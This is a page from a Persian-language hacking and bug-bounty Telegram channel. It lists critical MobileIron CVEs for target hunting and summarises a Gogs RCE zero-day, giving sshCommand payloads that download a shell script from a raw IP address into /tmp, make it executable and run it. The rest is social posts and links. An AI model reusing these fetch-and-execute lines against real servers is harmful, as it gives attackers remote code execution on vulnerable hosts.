Hack Haven – Telegram
Hack Haven
586 subscribers
28 photos
13 videos
9 files
130 links
لینک گروه
@hackhaven_gap
Download Telegram
MobileIron
یک پلتفرم برای مدیریت دستگاه های تلفن همراه برای سازمان هاست

ویژگی‌های کلیدی MobileIron:
▫️Unified Endpoint Management (UEM)
▫️Zero Trust Security
▫️Mobile Threat Defense (MTD)
▫️Cross-Platform Management (iOS, Android, Windows, macOS)
▫️Containerization (Data Separation)
▫️Identity and Access Management (IAM)
▫️Automated Compliance and Remediation
▫️Per-App Secure VPN
▫️Comprehensive Reporting and Admin Dashboard

لیستی از مهم‌ترین آسیب‌پذیری‌های MobileIron:

▫️CVE-2023-35082: Remote Unauthenticated API Access Vulnerability (Score: 10.0)
▫️CVE-2023-35078: Remote Unauthenticated API Access Vulnerability / Authentication Bypass (Score: 9.8)
▫️CVE-2023-38035: API Authentication Bypass on Sentry Administrator Interface (Score: 9.8)
▫️CVE-2020-15505: Remote Code Execution (RCE) via Unspecified Vectors (Score: 9.8)
▫️CVE-2020-15506: Authentication Bypass (Score: 9.8)
▫️CVE-2020-15507: Arbitrary File Reading (Score: 7.5)
▫️CVE-2021-3540: Escaping Restricted Shell / Privilege Escalation (Score: N/A publicly listed, but impacts privilege)

#Service_hunting

@hackhaven_new
7👍1
یدونه zero day برای Gogs اومده که خیلی بحاله
بخاطر درست پچ نشدن cve قبلی(CVE-2024-55947) این باگ بوجود اومده
نیاز به یک یوزر عادی داره و No authentication نیست.

https://www.wiz.io/blog/wiz-research-gogs-cve-2025-8110-rce-exploit
6
Hack Haven
یدونه zero day برای Gogs اومده که خیلی بحاله بخاطر درست پچ نشدن cve قبلی(CVE-2024-55947) این باگ بوجود اومده نیاز به یک یوزر عادی داره و No authentication نیست. https://www.wiz.io/blog/wiz-research-gogs-cve-2025-8110-rce-exploit
exploit

-دانلود فایل اتکر:


sshCommand = wget http://106.53.108.81/123.sh -O /tmp/123.sh


بجای اینکه به گیت وصل شه فایل رو دانلود میکنه

executable کردن فایل-


sshCommand = chmod +x /tmp/123.sh



– اجرای شل


sshCommand = bash /tmp/123.sh


@hackhaven_new
5
این فقط یک رودمپ ساده یا یک نقشه راه برای مبتدیان نیست، بلکه یک راهنمای اصولی براساس سطح شحص است، فرقی نمیکنه تازه بخوای شروع کنی و ه.کر بشی یا نه حتی سابقه کار داری یا باگ هانتر هستی، این پیام اینده کاریت رو بهتر خواهد کرد
نظرت رو راجب این پست باهام مطرح کن ❤️‍🔥

فرقی نمیکنه بخوای مهاجرت کنی یا فریلنسری کار کنی این پست مطمئنم بخشی از نیازت رو برطرف میکنه


https://www.instagram.com/reel/DSPnPq3jXcL/?igsh=emRvbjU3ZTRjc2Np
11👎1
یوتیوب درآمد یوتیوبرای فارسی رو شدیدا کم کرده.
۴سالی بود میخواستم چنل یوتیوب بزنم تولید محتوا کنم‌.
خداروشکر دیگه عذاب وجدان ندارم که انجام ندادم.
🤣23
Forwarded from 𝗔𝗺𝗲𝗿.𝗘𝗧𝗛 𝗫
🥰5🤣3
Hack Haven
Voice message
اگه تارگتای ایرانی پول ندادن اینو براشون بفرستید.
🤣13
Hack Haven pinned Deleted message
بی پرده ترین، بی سانسور ترین
و کامل ترین حالت ممکن از یک رایتاپ اینجاست
شرح اسیب پذیری
ترکیبش با اسیب پذیری دیگر
و اینکه داپلیکیت شد ولی در نهایت با اینکه واقعا داپ بود، تبدیل به ده هزار دلار شد

دوس داشتی نشرش بده رفیق ❤️‍🔥


https://www.instagram.com/reel/DSXVKl7Doh0/?igsh=bHFtaGFqcDRhYzYz
10
Forwarded from GO-TO CVE
15
آمریکا اهدای گرین کارت
از طریق لاتاری را تعطیل کرد

دیگه نیاز نیست نیست منتظر جواب لاتاری باشیم
🔥12😢3👏1